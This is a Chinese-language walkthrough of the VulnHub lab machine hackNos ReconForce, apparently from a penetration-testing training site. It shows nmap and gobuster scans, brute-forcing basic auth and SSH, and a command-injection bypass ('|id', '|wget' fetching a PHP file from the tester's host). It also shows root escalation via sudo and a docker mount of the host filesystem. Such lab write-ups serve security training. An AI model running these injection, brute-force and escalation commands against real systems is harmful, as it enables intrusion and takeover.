1. 首页
  2. 靶场测试

[原创] 靶机系列测试 ReconForce

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

1         交流平台

随着教程的推出,看视频的人也越来越多,随之而来的问题也增多,本人平时非常忙,难以有时间回复大家的问题,特意建立了一个QQ群,里面有很多这方面的高手,有什么不懂的,请到群里提问,咨询问题的时候,一定要详细,不然没人会回复你,另外本人有时间会在群内直播测试靶机,还没加上群的赶快加上了。

[原创] 靶机系列测试 ReconForce

1         介绍

1.1  靶机介绍

描述 说明
Difficulty Easy to Intermediate
Flag 2 Flag first user And the second root
Learning Web Application | Enumeration | Privilege Escalation

下载地址

https://www.vulnhub.com/entry/hacknos-reconforce,416/

难度 中等

3靶机测试

3.1信息收集

3.1.1 nmap扫描

nmap -sC -sV 192.168.0.136 -oA ReconForce-port

[原创] 靶机系列测试 ReconForce

3.2  目录扫描

gobuster dir -u http://192.168.0.136 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

[原创] 靶机系列测试 ReconForce

3.3  访问主页

[原创] 靶机系列测试 ReconForce

http://192.168.0.136/5ecure/ 存在基础验证登录

[原创] 靶机系列测试 ReconForce

is requesting your username and password. The site says: “Recon Security”

3.4 ftp匿名登录

ftp 192.168.0.136

[原创] 靶机系列测试 ReconForce

ftp允许匿名登录 但是目录没有任何内容 但是有登录提示 Secure@hackNos

3.5  python 组合密码

world=[‘Recon’,’Security’,’5ecure’,’Secure’]

for i in world:

    print(i+’@hackNos’)

Recon@hackNos

Security@hackNos

5ecure@hackNos

Secure@hackNos

3.5.1 破解基础认证

msfconsole

useauxiliary(scanner/http/http_login

[原创] 靶机系列测试 ReconForce

3.6 命令执行漏洞

[原创] 靶机系列测试 ReconForce
[原创] 靶机系列测试 ReconForce
3.6.1        分析源码

|ls
|cat out.php

[原创] 靶机系列测试 ReconForce

过滤众多字符  |id 这样刚好就绕过了。

下载文件

|wget http://192.168.0.118/1.php

3.7  建立交互shell

[原创] 靶机系列测试 ReconForce

python -c ‘import pty;pty.spawn(“/bin/bash”)’

[原创] 靶机系列测试 ReconForce

3.8 测试用户recon密码

cat /etc/passwd | grep bash

root:x:0:0:root:/root:/bin/bash

recon:x:1000:119:rahul:/home/recon:/bin/bash

3.8.1        hydra测试密码

hydra -l recon -P pass.txt ssh://192.168.0.136

[原创] 靶机系列测试 ReconForce

3.9 登录recon用户

ssh recon@192.168.0.136

[原创] 靶机系列测试 ReconForce

3.10  得到user.txt

[原创] 靶机系列测试 ReconForce

3.11  特权提升

3.11.1      方法一
[原创] 靶机系列测试 ReconForce

看到目录下有 sudo_as_admin_successful

sudo -l 输入密码 Security@hackNos

[原创] 靶机系列测试 ReconForce

看到可以执行任何命令

得到root.txt

[原创] 靶机系列测试 ReconForce

3.11.2  方法二

[原创] 靶机系列测试 ReconForce

创建容器 shell

docker run -v /:/mnt –rm -it alpine chroot /mnt sh

自动下载 alpine 文件

创建宿主根目录到 mbt目录

docker run -it -v /:/mbt e7d92cdc71fe

cd /mbt

cat root/root.txt

[原创] 靶机系列测试 ReconForce

4 学习总结

  • nmap扫描
  • gobuster目录扫描
  • 基础认证破解
  • 密码组合
  • 命令执行漏洞
  • 创建交互式shell
  • hydra ssh破解
  • 分析源码
  • dacker提权

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/963.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息